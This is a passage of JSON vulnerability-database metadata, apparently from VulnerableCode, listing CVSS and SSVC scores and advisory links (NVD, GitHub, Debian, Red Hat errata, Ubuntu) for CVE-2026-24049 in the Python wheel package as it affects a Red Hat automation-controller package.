"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" 
}, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e" }, { "reference_url": "https://github.com/pypa/wheel/releases/tag/0.46.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/releases/tag/0.46.2" }, { "reference_url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274", "reference_id": "1126274", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274" }, { "reference_url": 
"https://bugzilla.redhat.com/show_bug.cgi?id=2431959", "reference_id": "2431959", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959" }, { "reference_url": "https://github.com/advisories/GHSA-8rrh-rw8j-w5fx", "reference_id": "GHSA-8rrh-rw8j-w5fx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8rrh-rw8j-w5fx" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:10184", "reference_id": "RHSA-2026:10184", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:10184" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1504", "reference_id": "RHSA-2026:1504", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1504" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1902", "reference_id": "RHSA-2026:1902", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1902" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1939", "reference_id": "RHSA-2026:1939", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1939" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1942", "reference_id": "RHSA-2026:1942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2090", "reference_id": "RHSA-2026:2090", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2090" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2106", "reference_id": "RHSA-2026:2106", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2106" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2139", "reference_id": "RHSA-2026:2139", "reference_type": "", 
"scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2139" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2675", "reference_id": "RHSA-2026:2675", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2675" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2681", "reference_id": "RHSA-2026:2681", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2681" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2694", "reference_id": "RHSA-2026:2694", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2694" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2695", "reference_id": "RHSA-2026:2695", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2695" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2710", "reference_id": "RHSA-2026:2710", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2710" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2754", "reference_id": "RHSA-2026:2754", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2754" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2762", "reference_id": "RHSA-2026:2762", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2762" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2823", "reference_id": "RHSA-2026:2823", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2823" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2865", "reference_id": "RHSA-2026:2865", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2865" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2866", "reference_id": "RHSA-2026:2866", "reference_type": "", 
"scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2866" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2900", "reference_id": "RHSA-2026:2900", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2900" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2925", "reference_id": "RHSA-2026:2925", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2925" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3461", "reference_id": "RHSA-2026:3461", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3461" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3462", "reference_id": "RHSA-2026:3462", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3462" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3713", "reference_id": "RHSA-2026:3713", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3713" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3782", "reference_id": "RHSA-2026:3782", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3782" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3958", "reference_id": "RHSA-2026:3958", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3958" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3959", "reference_id": "RHSA-2026:3959", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3959" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3960", "reference_id": "RHSA-2026:3960", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3960" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4185", "reference_id": "RHSA-2026:4185", "reference_type": "", 
"scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4185" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4215", "reference_id": "RHSA-2026:4215", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4215" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4271", "reference_id": "RHSA-2026:4271", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4271" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4942", "reference_id": "RHSA-2026:4942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5119", "reference_id": "RHSA-2026:5119", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5119" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6555", "reference_id": "RHSA-2026:6555", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6555" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6562", "reference_id": "RHSA-2026:6562", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6562" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6565", "reference_id": "RHSA-2026:6565", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6565" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7250", "reference_id": "RHSA-2026:7250", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7250" }, { "reference_url": "https://usn.ubuntu.com/8221-1/", "reference_id": "USN-8221-1", "reference_type": "", "scores": [], "url": 
"https://usn.ubuntu.com/8221-1/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-24049", "GHSA-8rrh-rw8j-w5fx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fm8w-bycx-4yex" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el9ap" }